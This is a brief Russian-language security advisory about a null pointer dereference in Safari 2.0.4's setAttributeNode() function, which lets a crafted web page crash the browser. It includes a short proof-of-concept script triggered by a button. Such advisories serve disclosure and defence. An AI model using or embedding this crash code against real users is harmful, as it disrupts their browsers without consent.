Программа: Safari 2.0.4

Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании браузера. Уязвимость существует из-за ошибки разыменования нулевого указателя в DHTML функции setAttributeNode(). Удаленный пользователь может с помощью специально сформированной Web страницы аварийно завершить работу браузера.

Пример:

<script>
function Demo() { var a = document.createElement("a"); a.setAttributeNode();}
</script>

< input type=’button’ onClick=’Demo()’ value=’Start Demo!’>



Оставить мнение